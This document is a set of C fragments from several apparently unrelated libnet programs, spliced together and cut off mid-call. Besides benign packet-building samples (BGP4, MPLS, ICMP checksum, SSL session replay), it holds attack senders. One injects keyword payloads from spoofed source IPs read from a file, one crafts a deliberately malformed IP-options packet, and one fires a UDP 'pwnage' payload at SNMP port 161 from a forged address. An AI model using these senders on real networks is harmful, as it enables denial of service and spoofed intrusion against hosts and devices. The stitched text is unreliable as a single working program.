libnet_do_checksum(l, (u_int8_t *) ip, IPPROTO_IP, data_len);
if ( debug ) {
printf("%.2x:%.2x:%.2x:%.2x:%.2x:%.2x -> ",
ether->ether_shost[0], ether->ether_shost[1],
ether->ether_shost[2], ether->ether_shost[3],
ether->ether_shost[4], ether->ether_shost[5]);
printf("%.2x:%.2x:%.2x:%.2x:%.2x:%.2x\t",
ether->ether_dhost[0], ether->ether_dhost[1],
ether->ether_dhost[2], ether->ether_dhost[3],
ether->ether_dhost[4], ether->ether_dhost[5]);
switch( ntohs(ether->ether_type) ) {
case ETHERTYPE_IP:
printf("Proto IP \t");
break;
case ETHERTYPE_ARP:
printf("Proto ARP \t");
break;
case ETHERTYPE_PUP:
printf("Proto PUP \t");
break;
case ETHERTYPE_REVARP:
printf("Proto RARP\t");
break;
case ETHERTYPE_VLAN:
printf("Proto VLAN\t");
break;
default:
printf("Proto %u\t",
ntohs(ether->ether_type));
}
printf("Length %i\n", len);
}
if ( acx >= skip ) {
c = libnet_adv_write_link(l, buf, len);
if (c !=(u_int) -1)
data_pushed += c;
}
/* if ( c != len )
* perror("write_ll");
*/
if ( !(acx % mark) ) {
gettimeofday(&tv2, NULL);
sec = (tv2.tv_sec - tv.tv_sec)
- (tv.tv_usec - tv2.tv_usec) / 1000000.0;
printf(" %8lu @ %.1f pkts/sec and %.1f k/s\n", acx,
mark/sec, (data_pushed/1024.0)/sec );
data_pushed = 0;
gettimeofday(&tv, NULL);
}
}
if ((acx-1) % mark) { /* There is a remainder */
gettimeofday(&tv2, NULL);
sec = (tv2.tv_sec - tv.tv_sec)
- (tv.tv_usec - tv2.tv_usec) / 1000000.0;
printf(" %8lu @ %.1f pkts/sec and %.1f k/s\n", acx-1,
((acx-1) % mark)/sec, (data_pushed/1024.0)/sec );
}
libnet_destroy(l);
free( buf );
return ( 0 );
}
int main(int argc, char *argv[])
{
int c, i;
u_char *cp;
libnet_t *l;
libnet_ptag_t ip;
libnet_ptag_t tcp;
struct libnet_stats ls;
u_long nround;
u_long src_ip, dst_ip;
u_short src_prt, dst_prt;
u_char opt[20];
char errbuf[LIBNET_ERRBUF_SIZE];
FILE *dmf, *nsf, *srcf;
char *dms[MAXLINES], *nss[MAXLINES], *srcs[MAXLINES];
int pay_s[MAXLINES];
char *dmfn = "kw.txt";
char *nsfn = "dst.txt";
char *srcfn = "src.txt";
char *paybuf, *pp;
int jd = 0;
int jn = 0;
int js = 0;
int kd, kn;
u_char bt;
char lb[80];
char linebuf[80];
char payld[100], tpayld[100];
/* Read the keywords, dest IPs, src IPs , and construct http payload */
if( (dmf = fopen(dmfn, "r")) == NULL) {
fprintf(stderr, "Error opening key word file %s \n", dmfn);
exit(1);
} /* end if */
if( (nsf = fopen(nsfn, "r")) == NULL) {
fprintf(stderr, "Error opening file %s \n", nsfn);
exit(1);
} /* end if */
if( (srcf = fopen(srcfn, "r")) == NULL) {
fprintf(stderr, "Error opening file %s \n", srcfn);
exit(1);
} /* end if */
printf("Reading key words ...\n");
while ((jd < MAXLINES) && (fgets(lb, 80, dmf)!=0) ) {
kd = 0;
kn = 0;
while (lb[kd] != '\0') { /* get rid of space and CR */
linebuf[kn++] = lb[kd++];
} /* end while */
linebuf[kn] = '\0';
paybuf = linebuf;
if (kn != 0) { /* not empty line */
/* convert line into http query payload */
dms[jd] = (char *)malloc(strlen(paybuf)+1); /* alloc mem */
strcpy(dms[jd], paybuf);
pay_s[jd] = strlen(dms[jd]);
/* ===== for message body debugging */
for (kn=0; kn < pay_s[jd]; kn++) {
bt = *(dms[jd] + kn);
printf(" %02X", bt);
}
printf("\n");
/*=== */
jd++;
} /* end if */
} /* end while */
printf("Total http requests: %d\n", jd);
fclose(dmf);
js=0;
printf("Reading spoofed source IPs ... \n");
while ((js < MAXLINES) && (fgets(lb, 80, srcf)!=0) ) {
kd = 0;
kn = 0;
while (lb[kd] != '\0') { /* get rid of space and CR */
if ((lb[kd] != ' ') && (lb[kd] != '\n')) {
linebuf[kn] = lb[kd];
kn++;
} /* end if */
kd++;
} /* end while */
linebuf[kn] = '\0';
if (kn != 0) { /* not empty line */
srcs[js] = (char *)malloc(strlen(linebuf)+1);
strcpy(srcs[js++], linebuf);
/* printf("%s\n", srcs[js-1]); */
} /* end if */
} /* end while */
printf("Total source IPs: %d\n", js);
fclose(srcf);
jn = 0;
printf("Reading dst IPs ... \n");
while ((jn < MAXLINES) && (fgets(lb, 80, nsf)!=0) ) {
kd = 0;
kn = 0;
while (lb[kd] != '\0') { /* get rid of space and CR */
if ((lb[kd] != ' ') && (lb[kd] != '\n')) {
linebuf[kn] = lb[kd];
kn++;
} /* end if */
kd++;
} /* end while */
linebuf[kn] = '\0';
if (kn != 0) { /* not empty line */
nss[jn] = (char *)malloc(strlen(linebuf)+1);
strcpy(nss[jn++], linebuf);
/* printf("%s\n", nss[jn-1]); */
} /* end if */
} /* end while */
printf("Total dst IPs: %d\n", jn);
fclose(nsf);
nround = 0;
/* while(1) { non-stop sending ... */
/* Initialize the library. Root priviledges are required. */
l = libnet_init(
LIBNET_RAW4, /* injection type */
NULL, /* network interface */
errbuf); /* errbuf */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
exit(EXIT_FAILURE);
}
libnet_seed_prand(l);
tcp = 0;
ip = 0;
for(kd=0; kd < jd; kd++) { /* loop over all http reqs */
for(kn=0; kn < jn; kn++) { /* loop over all dst IPs */
if ((dst_ip = libnet_name2addr4(l, nss[kn], LIBNET_RESOLVE)) == -1) {
fprintf(stderr, "Bad dest IP address: %s\n", nss[kn]);
exit(EXIT_FAILURE);
} /* end if */
/* printf("feeding %s for keyword %s ...\n", nss[kn], dms[kd]); */
i = (int)(libnet_get_prand(LIBNET_PRu16)/65535.0*(js-1)); /* Randsrc ip */
src_ip = libnet_name2addr4(l, srcs[i], LIBNET_RESOLVE); /* src ip */
printf("using source IP %s ...\n", srcs[i]);
src_prt = libnet_get_prand(LIBNET_PRu16); /* Random source port */
dst_prt = 1234; /* http */
/* Building TCP */
tcp = libnet_build_tcp(
src_prt, /* source port */
dst_prt, /* destination port */
libnet_get_prand(LIBNET_PRu32),
libnet_get_prand(LIBNET_PRu32),
0x18, /* (PSH, ACK) */
libnet_get_prand(LIBNET_PRu16), /* window size */
0, /* checksum */
0, /* urgent pointer */
LIBNET_TCP_H + pay_s[kd], /* packet length */
dms[kd], /* payload */
pay_s[kd], /* payload size */
l, /* libnet handle */
tcp); /* libnet id */
if (tcp == -1) {
fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l));
goto bad;
}
/* Building IP */
ip = libnet_build_ipv4(
LIBNET_IPV4_H + pay_s[kd] + LIBNET_TCP_H, /* length */
0x00, /* TOS */
0, /* IP ID */
0x4000, /* IP Frag */
64, /* TTL */
IPPROTO_TCP, /* protocol */
0, /* checksum */
src_ip,
dst_ip,
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
ip); /* libnet id */
if (ip == -1) {
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
/* Write it to the wire. */
c = libnet_write(l);
if (c == -1) {
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
goto bad;
} else {
/* printf("Wrote %d byte TCP packet; check the wire.\n", c); */
}
usleep(20); /* slow down to conserve bandwidth */
} /* end for */
} /* end for */
libnet_stats(l, &ls);
fprintf(stderr, "Packets sent: %ld\n"
"Packet errors: %ld\n"
"Bytes written: %ld\n",
ls.packets_sent, ls.packet_errors, ls.bytes_written);
libnet_destroy(l);
nround++;
printf("====== Round %ld sent ================\n", nround);
/* } end of while loop */
return (EXIT_SUCCESS);
bad:
libnet_destroy(l);
return (EXIT_FAILURE);
}
int
main(int argc, char *argv[])
{
int c;
libnet_t *l;
u_long src_ip, dst_ip, length;
libnet_ptag_t t = 0;
char errbuf[LIBNET_ERRBUF_SIZE];
u_char *payload = NULL;
u_long payload_s = 0;
u_char marker[LIBNET_BGP4_MARKER_SIZE];
u_short u_rt_l = 0;
u_char *withdraw_rt = NULL;
char flag_w = 0;
u_short attr_l = 0;
u_char *attr = NULL;
char flag_a = 0;
u_short info_l = 0;
u_char *info = NULL;
char flag_i = 0;
printf("libnet 1.1 packet shaping: BGP4 update + payload[raw]\n");
/*
* Initialize the library. Root priviledges are required.
*/
l = libnet_init(
LIBNET_RAW4, /* injection type */
NULL, /* network interface */
errbuf); /* error buffer */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
src_ip = 0;
dst_ip = 0;
memset(marker, 0x1, LIBNET_BGP4_MARKER_SIZE);
while ((c = getopt(argc, argv, "d:s:t:m:p:w:W:a:A:i:I:")) != EOF)
{
switch (c)
{
/*
* We expect the input to be of the form `ip.ip.ip.ip.port`. We
* point cp to the last dot of the IP address/port string and
* then seperate them with a NULL byte. The optarg now points to
* just the IP address, and cp points to the port.
*/
case 'd':
if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad destination IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 's':
if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad source IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 'p':
payload = (u_char *)optarg;
payload_s = strlen((char *)payload);
break;
case 'w':
withdraw_rt = (u_char *)optarg;
break;
case 'W':
u_rt_l = atoi(optarg);
break;
case 'a':
attr = (u_char *)optarg;
break;
case 'A':
attr_l = atoi(optarg);
break;
case 'i':
info = (u_char *)optarg;
break;
case 'I':
info_l = atoi(optarg);
break;
default:
exit(EXIT_FAILURE);
}
}
if (!src_ip || !dst_ip)
{
usage(argv[0]);
goto bad;
}
set_ptr_and_size(withdraw_rt, u_rt_l, 0x41, flag_w);
set_ptr_and_size(attr, attr_l, 0x42, flag_a);
set_ptr_and_size(info, info_l, 0x43, flag_i);
/*
* BGP4 update messages are "dynamic" are fields have variable size. The only
* sizes we know are those for the 2 first fields ... so we need to count them
* plus their value.
*/
length = LIBNET_BGP4_UPDATE_H + u_rt_l + attr_l + info_l + payload_s;
t = libnet_build_bgp4_update(
u_rt_l, /* Unfeasible Routes Length */
withdraw_rt, /* Withdrawn Routes */
attr_l, /* Total Path Attribute Length */
attr, /* Path Attributes */
info_l, /* Network Layer Reachability Information length */
info, /* Network Layer Reachability Information */
payload, /* payload */
payload_s, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build BGP4 update header: %s\n", libnet_geterror(l));
goto bad;
}
length+=LIBNET_BGP4_HEADER_H;
t = libnet_build_bgp4_header(
marker, /* marker */
length, /* length */
LIBNET_BGP4_UPDATE, /* message type */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build BGP4 header: %s\n", libnet_geterror(l));
goto bad;
}
length+=LIBNET_TCP_H;
t = libnet_build_tcp(
0x6666, /* source port */
179, /* destination port */
0x01010101, /* sequence number */
0x02020202, /* acknowledgement num */
TH_SYN, /* control flags */
32767, /* window size */
0, /* checksum */
0, /* urgent pointer */
length, /* TCP packet size */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l));
goto bad;
}
length+=LIBNET_IPV4_H;
t = libnet_build_ipv4(
length, /* length */
0, /* TOS */
242, /* IP ID */
0, /* IP Frag */
64, /* TTL */
IPPROTO_TCP, /* protocol */
0, /* checksum */
src_ip, /* source IP */
dst_ip, /* destination IP */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
/*
* Write it to the wire.
*/
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
goto bad;
}
else
{
fprintf(stderr, "Wrote %d byte TCP packet; check the wire.\n", c);
}
if (flag_w) free(withdraw_rt);
if (flag_a) free(attr);
if (flag_i) free(info);
libnet_destroy(l);
return (EXIT_SUCCESS);
bad:
if (flag_w) free(withdraw_rt);
if (flag_a) free(attr);
if (flag_i) free(info);
libnet_destroy(l);
return (EXIT_FAILURE);
}
int main(int argc, char **argv)
{
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_t *l;
char *device = NULL;
int c;
u_char *buf;
int packet_len = 0;
struct ip *IP;
struct tcphdr *TCP;
u_int32_t src = 0, dst = 0;
banner();
if (argc < 4) usage(argv[0]);
if ((l = libnet_init(LIBNET_RAW4, device, errbuf)) == NULL) {
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(-1);
}
if ((src = libnet_name2addr4(l, argv[1], LIBNET_RESOLVE)) == -1) {
fprintf(stderr, "Unresolved source address\n");
exit(-1);
}
if ((dst = libnet_name2addr4(l, argv[2], LIBNET_RESOLVE)) == -1) {
fprintf(stderr, "Unresolved destination address\n");
exit(-1);
}
if ( (buf = malloc(IP_MAXPACKET)) == NULL ) {
perror("malloc");
exit(-1);
}
buf[20] = atoi(argv[3]);
buf[21] = 39; // our malformed size
for (c = 0; c<38; c+=3)
strncpy(&buf[22+c], "ECL", 3); // padding
TCP = (struct tcphdr *)(buf + IP_H + IPOPTS_MAX);
TCP->th_off = 5;
packet_len = IP_H + IPOPTS_MAX + (TCP->th_off << 2);
srand(time(NULL));
IP = (struct ip *) buf;
IP->ip_v = 4; /* version 4 */
IP->ip_hl = 5 + (IPOPTS_MAX / 4);/* 60 byte header */
IP->ip_tos = 0; /* IP tos */
IP->ip_len = htons(packet_len); /* total length */
IP->ip_id = rand(); /* IP ID */
IP->ip_off = htons(0); /* fragmentation flags */
IP->ip_ttl = 64; /* time to live */
IP->ip_p = IPPROTO_TCP; /* transport protocol */
IP->ip_sum = 0;
IP->ip_src.s_addr = src;
IP->ip_dst.s_addr = dst;
TCP->th_sport = htons(1337);
TCP->th_dport = htons(80);
TCP->th_seq = 0;
TCP->th_ack = 0;
TCP->th_x2 = 0;
TCP->th_flags = TH_SYN;
TCP->th_win = rand() & 0xffff;
TCP->th_sum = 0;
TCP->th_urp = 0;
libnet_do_checksum(l, (u_int8_t *)buf, IPPROTO_TCP, TCP->th_off << 2);
if ((c = libnet_write_raw_ipv4(l, buf, packet_len)) == -1)
{
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
exit(-1);
}
printf("Packet sent.\n");
libnet_destroy(l);
free(buf);
return (0);
}
int
main(int argc, char *argv[])
{
int c;
char *cp;
libnet_t *l;
libnet_ptag_t t;
u_char *payload;
u_long payload_s;
u_long src_ip, dst_ip;
u_short src_prt, dst_prt;
char errbuf[LIBNET_ERRBUF_SIZE];
printf("libnet 1.1 packet shaping: MPLS[link]\n");
/*
* Initialize the library. Root priviledges are required.
*/
l = libnet_init(
LIBNET_LINK_ADV, /* injection type */
NULL, /* network interface */
errbuf); /* error buffer */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
src_ip = 0;
dst_ip = 0;
src_prt = 0;
dst_prt = 0;
payload = NULL;
payload_s = 0;
while ((c = getopt(argc, argv, "d:s:p:")) != EOF)
{
switch (c)
{
/*
* We expect the input to be of the form `ip.ip.ip.ip.port`. We
* point cp to the last dot of the IP address/port string and
* then seperate them with a NULL byte. The optarg now points to
* just the IP address, and cp points to the port.
*/
case 'd':
if (!(cp = strrchr(optarg, '.')))
{
usage(argv[0]);
}
*cp++ = 0;
dst_prt = (u_short)atoi(cp);
if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad destination IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 's':
if (!(cp = strrchr(optarg, '.')))
{
usage(argv[0]);
}
*cp++ = 0;
src_prt = (u_short)atoi(cp);
if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad source IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 'p':
payload = (u_char *)optarg;
payload_s = strlen((char *)payload);
break;
default:
exit(EXIT_FAILURE);
}
}
if (!src_ip || !src_prt || !dst_ip || !dst_prt)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
t = libnet_build_tcp(
src_prt, /* source port */
dst_prt, /* destination port */
0xffffffff, /* sequence number */
0x00000000, /* acknowledgement num */
TH_SYN, /* control flags */
32767, /* window size */
0, /* checksum */
0, /* urgent pointer */
LIBNET_TCP_H + payload_s, /* TCP packet size */
payload, /* payload */
payload_s, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l));
goto bad;
}
t = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_TCP_H + payload_s, /* length */
0, /* TOS */
242, /* IP ID */
0, /* IP Frag */
64, /* TTL */
IPPROTO_TCP, /* protocol */
0, /* checksum */
src_ip, /* source IP */
dst_ip, /* destination IP */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
t = libnet_build_mpls(
29, /* label */
4, /* experimental */
LIBNET_MPLS_BOS_ON, /* bottom of stack */
0xff, /* ttl */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build MPLS header: %s\n", libnet_geterror(l));
goto bad;
}
t = libnet_build_mpls(
39, /* label */
5, /* experimental */
LIBNET_MPLS_BOS_ON, /* bottom of stack */
0xef, /* ttl */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build MPLS header: %s\n", libnet_geterror(l));
goto bad;
}
t = libnet_build_mpls(
59, /* label */
6, /* experimental */
LIBNET_MPLS_BOS_ON, /* bottom of stack */
0x0f, /* ttl */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build MPLS header: %s\n", libnet_geterror(l));
goto bad;
}
t = libnet_build_ethernet(
enet_dst, /* ethernet destination */
enet_src, /* ethernet source */
ETHERTYPE_MPLS, /* protocol type */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build ethernet header: %s\n", libnet_geterror(l));
goto bad;
}
/*
* Write it to the wire.
*/
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
goto bad;
}
else
{
fprintf(stderr, "Wrote %d byte MPLS frame; check the wire.\n", c);
}
libnet_destroy(l);
return (EXIT_SUCCESS);
bad:
libnet_destroy(l);
return (EXIT_FAILURE);
}
int main(int argc, char **argv)
{
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_t *l;
int c;
u_char *buf;
int packet_len = 0;
struct ip *IP;
struct udphdr *UDP;
u_int32_t src = 0, dst = 0;
banner();
if (argc < 3) usage(argv[0]);
if ((l = libnet_init(LIBNET_RAW4, NULL, errbuf)) == NULL) {
fprintf(stderr, "[!] libnet_init() failed: %s", errbuf);
exit(-1);
}
if ((src = libnet_name2addr4(l, argv[1], LIBNET_RESOLVE)) == -1) {
fprintf(stderr, "[!] Unresolved source address.\n");
exit(-1);
}
if ((dst = libnet_name2addr4(l, argv[2], LIBNET_RESOLVE)) == -1) {
fprintf(stderr, "[!] Unresolved destination address.\n");
exit(-1);
}
if ((buf = malloc(IP_MAXPACKET)) == NULL) {
perror("malloc");
exit(-1);
}
UDP = (struct udphdr *)(buf + LIBNET_IPV4_H);
packet_len = LIBNET_IPV4_H + LIBNET_UDP_H + sizeof(pwnage) - 1;
srand(time(NULL));
IP = (struct ip *) buf;
IP->ip_v = 4; /* version 4 */
IP->ip_hl = 5; /* header length */
IP->ip_tos = 0; /* IP tos */
IP->ip_len = htons(packet_len); /* total length */
IP->ip_id = rand(); /* IP ID */
IP->ip_off = htons(0); /* fragmentation flags */
IP->ip_ttl = 64; /* time to live */
IP->ip_p = IPPROTO_UDP; /* transport protocol */
IP->ip_sum = 0;
IP->ip_src.s_addr = src;
IP->ip_dst.s_addr = dst;
UDP->uh_sport = rand();
UDP->uh_dport = (argc > 3) ? htons((u_short)atoi(argv[3])) : htons(161);
UDP->uh_ulen = htons(LIBNET_UDP_H + sizeof(pwnage) - 1);
UDP->uh_sum = 0;
memcpy(buf + LIBNET_IPV4_H + LIBNET_UDP_H, pwnage, sizeof(pwnage) - 1);
libnet_do_checksum(l, (u_int8_t *)buf, IPPROTO_UDP, packet_len - LIBNET_IPV4_H);
if ((c = libnet_write_raw_ipv4(l, buf, packet_len)) == -1)
{
fprintf(stderr, "[!] Write error: %s\n", libnet_geterror(l));
exit(-1);
}
printf("[+] Packet sent.\n");
libnet_destroy(l);
free(buf);
return (0);
}
// Sends an empty TCP segment with the specified parameters
int sendEmptyTCPSegment( libnet_t *libnet_c,
TcpSession *sess,
u_int32_t seq,
u_int32_t ack,
u_int8_t control,
NM_PacketDir dir )
{
libnet_ptag_t tcp, ip, ethernet;
tcp = ip = ethernet = 0;
tcp = libnet_build_tcp(
( dir == ePacketDirFromClient ) ? sess->clientStream.port : ( config.cap[capindex]->dsslport ? config.cap[capindex]->dsslport: sess->serverStream.port ), /* source port */
( dir == ePacketDirFromClient ) ? ( config.cap[capindex]->dsslport ? config.cap[capindex]->dsslport: sess->serverStream.port ) : sess->clientStream.port, /* destination port */
seq, /* sequence number */
ack, /* acknowledgement num */
control, /* control flags */
32767, /* window size */
0, /* checksum */
10, /* urgent pointer */
LIBNET_TCP_H, /* TCP packet size */
NULL, /* payload */
0, /* payload size */
libnet_c, /* libnet handle */
0); /* libnet id */
if (tcp == -1)
{
if (config.daemon)
syslog(LOG_ERR, "Can't build TCP header: %s", libnet_geterror(libnet_c));
else
fprintf(stderr, "Can't build TCP header: %s.\n", libnet_geterror(libnet_c));
return( -1 );
}
ip = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_TCP_H, /* length */
0, /* TOS */
54609, /* IP ID */
0, /* IP Frag */
64, /* TTL */
IPPROTO_TCP, /* protocol */
0, /* checksum */
( dir == ePacketDirFromClient ) ? sess->clientStream.ip_addr : sess->serverStream.ip_addr, /* source IP */
( dir == ePacketDirFromClient ) ? sess->serverStream.ip_addr : sess->clientStream.ip_addr, /* destination IP */
NULL, /* payload */
0, /* payload size */
libnet_c, /* libnet handle */
0); /* libnet id */
if (ip == -1)
{
if (config.daemon)
syslog(LOG_ERR, "Can't build IP header: %s", libnet_geterror(libnet_c));
else
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(libnet_c));
return( -1 );
}
ethernet = libnet_build_ethernet(
( dir == ePacketDirFromClient ) ? config.cap[capindex]->dst_interface_mac : config.cap[capindex]->src_interface_mac, /* ethernet dest */
( dir == ePacketDirFromClient ) ? config.cap[capindex]->src_interface_mac : config.cap[capindex]->dst_interface_mac, /* ethernet source */
ETHERTYPE_IP, /* protocol type */
NULL, /* payload */
0, /* payload size */
libnet_c, /* libnet handle */
0); /* libnet id */
if (ethernet == -1)
{
if (config.daemon)
syslog(LOG_ERR, "Can't build ethernet header: %s", libnet_geterror(libnet_c));
else
fprintf(stderr, "Can't build ethernet header: %s.\n", libnet_geterror(libnet_c));
return( -1 );
}
if (libnet_write(libnet_c) == -1)
{
if (config.daemon)
syslog(LOG_ERR, "write error: %s", libnet_geterror(libnet_c));
else
fprintf(stderr, "Write error: %s.\n", libnet_geterror(libnet_c));
return( -1 );
}
libnet_clear_packet(libnet_c);
return( 1 );
}
u_int16_t get_sum(u_int8_t *payload, u_int32_t total_pload_size, u_int16_t id,
u_int16_t seq) {
/* Builds the ICMP header with the whole payload, gets
* the checksum from it and returns it (in host order). */
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_ptag_t icmp_tag;
u_int8_t *packet;
u_int32_t packet_size;
u_int16_t *sum_p, sum;
u_int8_t dummy_dst[6] = {0, 0, 0, 0, 0, 0};
icmp_tag = LIBNET_PTAG_INITIALIZER;
/* Switching to advanced link mode */
/* Nothing should be built yet and all random numbers
* * should be already generated. */
libnet_destroy(l);
l = libnet_init(LIBNET_LINK_ADV, "eth0", errbuf);
if (l == NULL) {
fprintf(stderr, "libnet_init() failed (link_adv): %s\n", errbuf);
exit(EXIT_FAILURE);
}
/* Building the header */
icmp_tag = libnet_build_icmpv4_echo(ICMP_ECHO, 0, 0, id, seq, payload,
total_pload_size, l, icmp_tag);
if (icmp_tag == -1) {
fprintf(stderr, "Error building ICMP header: %s\n", libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
/* Building dummy IP header */
if (libnet_autobuild_ipv4(
(LIBNET_IPV4_H + LIBNET_ICMPV4_ECHO_H + total_pload_size),
IPPROTO_ICMP, 0, l) == -1) {
fprintf(stderr, "Error building dummy IP header: %s\n", libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
/* Building dummy Ethernet header */
if (libnet_autobuild_ethernet(dummy_dst, ETHERTYPE_IP, l) == -1) {
fprintf(stderr, "Error building dummy Ethernet header: %s\n",
libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
/* Pulling the packet */
if (libnet_adv_cull_packet(l, &packet, &packet_size) == -1) {
fprintf(stderr, "Error pulling the packet: %s\n", libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
/* Grabbing the checksum */
/* We want the 37th and 38th bytes: eth header (14) + ip
* * header (20) + icmp type and code (2) = 36 */
sum_p = (u_int16_t *)(packet + 36);
sum = ntohs(*sum_p);
/* Freeing memory */
libnet_adv_free_packet(l, packet);
/* Clearing the header */
libnet_clear_packet(l);
/* Switching back to IPv4 raw socket mode */
libnet_destroy(l);
l = libnet_init(LIBNET_RAW4, "eth0", errbuf);
if (l == NULL) {
fprintf(stderr, "libnet_init() failed (raw4, 2nd call): %s\n", errbuf);
exit(EXIT_FAILURE);
}
return sum;
}
// Handles decrypted data from libdssl
static void data_callback_proc(NM_PacketDir dir, void* user_data, u_char* pkt_payload, uint32_t pkt_size, DSSL_Pkt* last_packet)
{
libnet_ptag_t tcp, ip, ethernet;
register libnet_t *libnet_c;
TcpSession *sess = (TcpSession*) user_data;
uint32_t bytes_written, bytes_to_write;
u_char* payload_ptr;
FakeSessionState *mySession = (FakeSessionState*) sess->user_data;
// Initialise byte counter and payload pointer
bytes_written = 0;
payload_ptr = pkt_payload;
tcp = ip = ethernet = 0;
if (config.loglevel > 0 && !config.daemon)
{
switch(dir)
{
case ePacketDirFromClient:
fprintf(stderr, "\nC->S: %d bytes\n", pkt_size );
break;
case ePacketDirFromServer:
fprintf(stderr, "S->C: %d bytes\n", pkt_size );
break;
default:
fprintf(stderr, "\nUnknown packet direction!");
break;
}
}
// Get libnet context
libnet_c = mySession->ln;
// Send handshake if necessary
if( mySession->handshakeSent == 0 )
{
sendTCPHandshake( libnet_c, sess, mySession );
mySession->handshakeSent = 1;
}
// Split pkt_payload into a 1460 byte MSS
while( bytes_written < pkt_size )
{
// Work out how many bytes to write on this pass
bytes_to_write = ( ( pkt_size - bytes_written ) < 1460 ) ? ( pkt_size - bytes_written ) : 1460;
tcp = libnet_build_tcp(
( dir == ePacketDirFromClient ) ? sess->clientStream.port : ( config.cap[capindex]->dsslport ? config.cap[capindex]->dsslport: sess->serverStream.port ), /* source port */
( dir == ePacketDirFromClient ) ? ( config.cap[capindex]->dsslport ? config.cap[capindex]->dsslport: sess->serverStream.port ) : sess->clientStream.port, /* destination port */
( dir == ePacketDirFromClient ) ? mySession->clientSeq : mySession->serverSeq, /* sequence number */
( dir == ePacketDirFromClient ) ? mySession->serverSeq : mySession->clientSeq, /* acknowledgement num */
TH_ACK, /* control flags */
32767, /* window size */
0, /* checksum */
10, /* urgent pointer */
LIBNET_TCP_H + bytes_to_write, /* TCP packet size */
payload_ptr, /* payload */
bytes_to_write, /* payload size */
libnet_c, /* libnet handle */
0); /* libnet id */
// Increment count of bytes written
bytes_written += bytes_to_write;
if( dir == ePacketDirFromClient )
mySession->clientSeq += bytes_to_write;
else
mySession->serverSeq += bytes_to_write;
// Increment payload_ptr
payload_ptr += bytes_to_write;
if (tcp == -1)
{
if (config.daemon)
syslog(LOG_ERR, "Can't build TCP header: %s", libnet_geterror(libnet_c));
else
fprintf(stderr, "Can't build TCP header: %s.\n", libnet_geterror(libnet_c));
}
else
{
ip = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_TCP_H + bytes_to_write, /* length */
0, /* TOS */
54609, /* IP ID */
0, /* IP Frag */
64, /* TTL */
IPPROTO_TCP, /* protocol */
0, /* checksum */
( dir == ePacketDirFromClient ) ? sess->clientStream.ip_addr : sess->serverStream.ip_addr, /* source IP */
( dir == ePacketDirFromClient ) ? sess->serverStream.ip_addr : sess->clientStream.ip_addr, /* destination IP */
NULL, /* payload */
0, /* payload size */
libnet_c, /* libnet handle */
0); /* libnet id */
if (ip == -1)
{
if (config.daemon)
syslog(LOG_ERR, "Can't build IP header: %s", libnet_geterror(libnet_c));
else
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(libnet_c));
}
else
{
ethernet = libnet_build_ethernet(
( dir == ePacketDirFromClient ) ? config.cap[capindex]->dst_interface_mac : config.cap[capindex]->src_interface_mac, /* ethernet destination */
( dir == ePacketDirFromClient ) ? config.cap[capindex]->src_interface_mac : config.cap[capindex]->dst_interface_mac, /* ethernet source */
